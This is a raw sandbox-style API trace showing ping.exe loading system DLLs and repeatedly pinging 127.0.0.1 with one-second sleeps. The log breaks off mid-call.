mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6562 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6563 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6564 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 6565 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6566 start_va = 0x7e060000 end_va = 0x7e15ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e060000" filename = "" Region: id = 6567 start_va = 0x820000 end_va = 0x85ffff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 6568 start_va = 0x950000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 6569 start_va = 0x7e189000 end_va = 0x7e18bfff entry_point = 0x0 region_type = private name = "private_0x000000007e189000" filename = "" Region: id = 6570 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 6571 start_va = 0x750000 end_va = 0x752fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 6572 start_va = 0x860000 end_va = 0x860fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 6573 start_va = 0x870000 end_va = 0x872fff entry_point = 0x870000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 6574 start_va = 0x990000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 6575 start_va = 0x9d0000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 6576 start_va = 0x7e183000 end_va = 0x7e185fff entry_point = 0x0 region_type = private name = "private_0x000000007e183000" filename = "" Thread: id = 364 os_tid = 0xbe0 [0120.234] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0120.234] __set_app_type (_Type=0x1) [0120.234] __p__fmode () returned 0x76ea1768 [0120.234] __p__commode () returned 0x76ea176c [0120.234] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0120.234] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0120.234] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.236] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.236] _fileno (_File=0x76ea4c28) returned 1 [0120.236] _get_osfhandle (_FileHandle=1) returned 0x28 [0120.236] GetFileType (hFile=0x28) returned 0x2 [0120.236] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x7eef48 | out: lpMode=0x7eef48) returned 0 [0120.236] GetLastError () returned 0x6 [0120.236] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x7eeeac, nSize=0x50 | out: lpBuffer="䤐¨") returned 0x0 [0120.236] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0120.239] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x7eef64 | out: phkResult=0x7eef64*=0x88) returned 0x0 [0120.239] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x7eef58, lpData=0x7eef60, lpcbData=0x7eef5c*=0x4 | out: lpType=0x7eef58*=0x0, lpData=0x7eef60*=0x0, lpcbData=0x7eef5c*=0x4) returned 0x2 [0120.239] RegCloseKey (hKey=0x88) returned 0x0 [0120.239] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0x7eef28*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x7eef64 | out: ppResult=0x7eef64*=0xa8c1b0*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa889e8*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0120.239] FreeAddrInfoW (pAddrInfo=0xa8c1b0*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa889e8*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0120.239] IcmpCreateFile () returned 0xa86d08 [0120.242] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0xa8c160 [0120.242] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0xa95270 [0120.242] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x7ef060, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0120.243] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0x7eef58, nSize=0x0, Arguments=0x7eef54 | out: lpBuffer="竈©廊~┗\x94䰨盪❋") returned 0x14 [0120.244] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0120.244] _fileno (_File=0x76ea4c28) returned 1 [0120.244] _get_osfhandle (_FileHandle=1) returned 0x28 [0120.244] GetFileType (hFile=0x28) returned 0x2 [0120.244] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x7eef1c | out: lpMode=0x7eef1c) returned 0 [0120.244] GetLastError () returned 0x6 [0120.244] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x7eee80, nSize=0x50 | out: lpBuffer="~❋") returned 0x0 [0120.244] _fileno (_File=0x76ea4c28) returned 1 [0120.244] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0120.244] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0120.244] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0xa97b00 [0120.244] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0xa97b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0120.244] _fileno (_File=0x76ea4c28) returned 1 [0120.244] _write (in: _FileHandle=1, _Buf=0xa97b00*, _MaxCharCount=0x14 | out: _Buf=0xa97b00*) returned 20 [0120.244] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0120.244] _fileno (_File=0x76ea4c28) returned 1 [0120.244] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0120.244] LocalFree (hMem=0xa97b00) returned 0x0 [0120.244] LocalFree (hMem=0xa97ac8) returned 0x0 [0120.244] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x7eef58, nSize=0x0, Arguments=0x7eef54 | out: lpBuffer="竈©廊~▪\x94䰨盪❚") returned 0x18 [0120.244] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0120.244] _fileno (_File=0x76ea4c28) returned 1 [0120.244] _get_osfhandle (_FileHandle=1) returned 0x28 [0120.244] GetFileType (hFile=0x28) returned 0x2 [0120.244] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x7eef1c | out: lpMode=0x7eef1c) returned 0 [0120.244] GetLastError () returned 0x6 [0120.244] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x7eee80, nSize=0x50 | out: lpBuffer="~❚") returned 0x0 [0120.244] _fileno (_File=0x76ea4c28) returned 1 [0120.244] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0120.244] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0120.244] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0xa8c188 [0120.244] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0xa8c188, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0120.244] _fileno (_File=0x76ea4c28) returned 1 [0120.244] _write (in: _FileHandle=1, _Buf=0xa8c188*, _MaxCharCount=0x18 | out: _Buf=0xa8c188*) returned 24 [0120.244] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0120.244] _fileno (_File=0x76ea4c28) returned 1 [0120.244] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0120.244] LocalFree (hMem=0xa8c188) returned 0x0 [0120.244] LocalFree (hMem=0xa97ac8) returned 0x0 [0120.245] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0120.245] IcmpSendEcho2Ex (in: IcmpHandle=0xa86d08, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xa8c160, RequestSize=0x20, RequestOptions=0x7eefd4, ReplyBuffer=0xa95270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xa95270) returned 0x1 [0120.245] InetNtopW (in: Family=2, pAddr=0x7eefc4, pStringBuf=0x7ef0ec, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0120.245] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x7eef58, nSize=0x0, Arguments=0x7eef54 | out: lpBuffer="笈©廊~⛔\x94䰨盪✣") returned 0x16 [0120.246] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0120.246] _fileno (_File=0x76ea4c28) returned 1 [0120.246] _get_osfhandle (_FileHandle=1) returned 0x28 [0120.246] GetFileType (hFile=0x28) returned 0x2 [0120.246] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x7eef1c | out: lpMode=0x7eef1c) returned 0 [0120.246] GetLastError () returned 0x6 [0120.246] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x7eee80, nSize=0x50 | out: lpBuffer="~✣") returned 0x0 [0120.246] _fileno (_File=0x76ea4c28) returned 1 [0120.246] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0120.246] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0120.246] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xa97b40 [0120.246] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xa97b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0120.246] _fileno (_File=0x76ea4c28) returned 1 [0120.246] _write (in: _FileHandle=1, _Buf=0xa97b40*, _MaxCharCount=0x16 | out: _Buf=0xa97b40*) returned 22 [0120.246] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0120.246] _fileno (_File=0x76ea4c28) returned 1 [0120.246] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0120.246] LocalFree (hMem=0xa97b40) returned 0x0 [0120.246] LocalFree (hMem=0xa97b08) returned 0x0 [0120.246] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x7eef58, nSize=0x0, Arguments=0x7eef54 | out: lpBuffer="笈©廊~⛿\x94䰨盪✼") returned 0x9 [0120.246] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0120.246] _fileno (_File=0x76ea4c28) returned 1 [0120.246] _get_osfhandle (_FileHandle=1) returned 0x28 [0120.246] GetFileType (hFile=0x28) returned 0x2 [0120.246] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x7eef1c | out: lpMode=0x7eef1c) returned 0 [0120.246] GetLastError () returned 0x6 [0120.246] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x7eee80, nSize=0x50 | out: lpBuffer="~✼") returned 0x0 [0120.246] _fileno (_File=0x76ea4c28) returned 1 [0120.246] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0120.246] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0120.246] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa88a60 [0120.246] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xa88a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0120.246] _fileno (_File=0x76ea4c28) returned 1 [0120.246] _write (in: _FileHandle=1, _Buf=0xa88a60*, _MaxCharCount=0x9 | out: _Buf=0xa88a60*) returned 9 [0120.246] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0120.246] _fileno (_File=0x76ea4c28) returned 1 [0120.246] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0120.246] LocalFree (hMem=0xa88a60) returned 0x0 [0120.246] LocalFree (hMem=0xa97b08) returned 0x0 [0120.246] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x7eef5c, nSize=0x0, Arguments=0x7eef58 | out: lpBuffer="笈©廊~➷\x94䰨盪✧") returned 0x9 [0120.246] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0120.246] _fileno (_File=0x76ea4c28) returned 1 [0120.246] _get_osfhandle (_FileHandle=1) returned 0x28 [0120.246] GetFileType (hFile=0x28) returned 0x2 [0120.246] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x7eef20 | out: lpMode=0x7eef20) returned 0 [0120.246] GetLastError () returned 0x6 [0120.246] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x7eee84, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0120.246] _fileno (_File=0x76ea4c28) returned 1 [0120.246] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0120.246] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0120.247] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa88a30 [0120.247] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xa88a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0120.247] _fileno (_File=0x76ea4c28) returned 1 [0120.247] _write (in: _FileHandle=1, _Buf=0xa88a30*, _MaxCharCount=0x9 | out: _Buf=0xa88a30*) returned 9 [0120.247] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0120.247] _fileno (_File=0x76ea4c28) returned 1 [0120.247] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0120.247] LocalFree (hMem=0xa88a30) returned 0x0 [0120.247] LocalFree (hMem=0xa97b08) returned 0x0 [0120.247] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x7eef58, nSize=0x0, Arguments=0x7eef54 | out: lpBuffer="笈©廊~⟘\x94䰨盪✨") returned 0x9 [0120.247] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0120.247] _fileno (_File=0x76ea4c28) returned 1 [0120.247] _get_osfhandle (_FileHandle=1) returned 0x28 [0120.247] GetFileType (hFile=0x28) returned 0x2 [0120.247] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x7eef1c | out: lpMode=0x7eef1c) returned 0 [0120.247] GetLastError () returned 0x6 [0120.247] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x7eee80, nSize=0x50 | out: lpBuffer="~✨") returned 0x0 [0120.247] _fileno (_File=0x76ea4c28) returned 1 [0120.247] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0120.247] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0120.247] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa88aa8 [0120.247] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xa88aa8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0120.247] _fileno (_File=0x76ea4c28) returned 1 [0120.247] _write (in: _FileHandle=1, _Buf=0xa88aa8*, _MaxCharCount=0x9 | out: _Buf=0xa88aa8*) returned 9 [0120.247] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0120.247] _fileno (_File=0x76ea4c28) returned 1 [0120.247] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0120.247] LocalFree (hMem=0xa88aa8) returned 0x0 [0120.247] LocalFree (hMem=0xa97b08) returned 0x0 [0120.247] Sleep (dwMilliseconds=0x3e8) [0121.249] IcmpSendEcho2Ex (in: IcmpHandle=0xa86d08, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xa8c160, RequestSize=0x20, RequestOptions=0x7eefd4, ReplyBuffer=0xa95270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xa95270) returned 0x1 [0121.250] InetNtopW (in: Family=2, pAddr=0x7eefc4, pStringBuf=0x7ef0ec, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0121.250] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x7eef58, nSize=0x0, Arguments=0x7eef54 | out: lpBuffer="羠©廊~⛔\x94䰨盪✣") returned 0x16 [0121.250] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0121.250] _fileno (_File=0x76ea4c28) returned 1 [0121.250] _get_osfhandle (_FileHandle=1) returned 0x28 [0121.250] GetFileType (hFile=0x28) returned 0x2 [0121.250] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x7eef1c | out: lpMode=0x7eef1c) returned 0 [0121.250] GetLastError () returned 0x6 [0121.250] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x7eee80, nSize=0x50 | out: lpBuffer="~✣") returned 0x0 [0121.250] _fileno (_File=0x76ea4c28) returned 1 [0121.250] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0121.250] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0121.250] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xa97fd8 [0121.250] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xa97fd8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0121.250] _fileno (_File=0x76ea4c28) returned 1 [0121.250] _write (in: _FileHandle=1, _Buf=0xa97fd8*, _MaxCharCount=0x16 | out: _Buf=0xa97fd8*) returned 22 [0121.250] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0121.250] _fileno (_File=0x76ea4c28) returned 1 [0121.250] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0121.250] LocalFree (hMem=0xa97fd8) returned 0x0 [0121.250] LocalFree (hMem=0xa97fa0) returned 0x0 [0121.250] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x7eef58, nSize=0x0, Arguments=0x7eef54 | out: lpBuffer="羠©廊~⛿\x94䰨盪✼") returned 0x9 [0121.250] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0121.250] _fileno (_File=0x76ea4c28) returned 1 [0121.250] _get_osfhandle (_FileHandle=1) returned 0x28 [0121.250] GetFileType (hFile=0x28) returned 0x2 [0121.250] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x7eef1c | out: lpMode=0x7eef1c) returned 0 [0121.250] GetLastError () returned 0x6 [0121.250] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x7eee80, nSize=0x50 | out: lpBuffer="~✼") returned 0x0 [0121.250] _fileno (_File=0x76ea4c28) returned 1 [0121.250] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0121.250] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0121.250] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa88a30 [0121.250] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xa88a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0121.250] _fileno (_File=0x76ea4c28) returned 1 [0121.250] _write (in: _FileHandle=1, _Buf=0xa88a30*, _MaxCharCount=0x9 | out: _Buf=0xa88a30*) returned 9 [0121.251] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0121.251] _fileno (_File=0x76ea4c28) returned 1 [0121.251] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0121.251] LocalFree (hMem=0xa88a30) returned 0x0 [0121.251] LocalFree (hMem=0xa97fa0) returned 0x0 [0121.251] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x7eef5c, nSize=0x0, Arguments=0x7eef58 | out: lpBuffer="羠©廊~➷\x94䰨盪✧") returned 0x9 [0121.251] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0121.251] _fileno (_File=0x76ea4c28) returned 1 [0121.251] _get_osfhandle (_FileHandle=1) returned 0x28 [0121.251] GetFileType (hFile=0x28) returned 0x2 [0121.251] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x7eef20 | out: lpMode=0x7eef20) returned 0 [0121.251] GetLastError () returned 0x6 [0121.251] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x7eee84, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0121.251] _fileno (_File=0x76ea4c28) returned 1 [0121.251] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0121.251] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0121.251] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa88a60 [0121.251] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xa88a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0121.251] _fileno (_File=0x76ea4c28) returned 1 [0121.251] _write (in: _FileHandle=1, _Buf=0xa88a60*, _MaxCharCount=0x9 | out: _Buf=0xa88a60*) returned 9 [0121.251] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0121.251] _fileno (_File=0x76ea4c28) returned 1 [0121.251] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0121.251] LocalFree (hMem=0xa88a60) returned 0x0 [0121.251] LocalFree (hMem=0xa97fa0) returned 0x0 [0121.251] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x7eef58, nSize=0x0, Arguments=0x7eef54 | out: lpBuffer="羠©廊~⟘\x94䰨盪✨") returned 0x9 [0121.251] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0121.251] _fileno (_File=0x76ea4c28) returned 1 [0121.251] _get_osfhandle (_FileHandle=1) returned 0x28 [0121.251] GetFileType (hFile=0x28) returned 0x2 [0121.251] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x7eef1c | out: lpMode=0x7eef1c) returned 0 [0121.251] GetLastError () returned 0x6 [0121.251] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x7eee80, nSize=0x50 | out: lpBuffer="~✨") returned 0x0 [0121.251] _fileno (_File=0x76ea4c28) returned 1 [0121.251] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0121.251] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0121.251] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xa88a30 [0121.251] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xa88a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0121.251] _fileno (_File=0x76ea4c28) returned 1 [0121.251] _write (in: _FileHandle=1, _Buf=0xa88a30*, _MaxCharCount=0x9 | out: _Buf=0xa88a30*) returned 9 [0121.251] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0121.251] _fileno (_File=0x76ea4c28) returned 1 [0121.251] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0121.251] LocalFree (hMem=0xa88a30) returned 0x0 [0121.251] LocalFree (hMem=0xa97fa0) returned 0x0 [0121.251] Sleep (dwMilliseconds=0x3e8) [0122.264] IcmpSendEcho2Ex (in: IcmpHandle=0xa86d08, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, 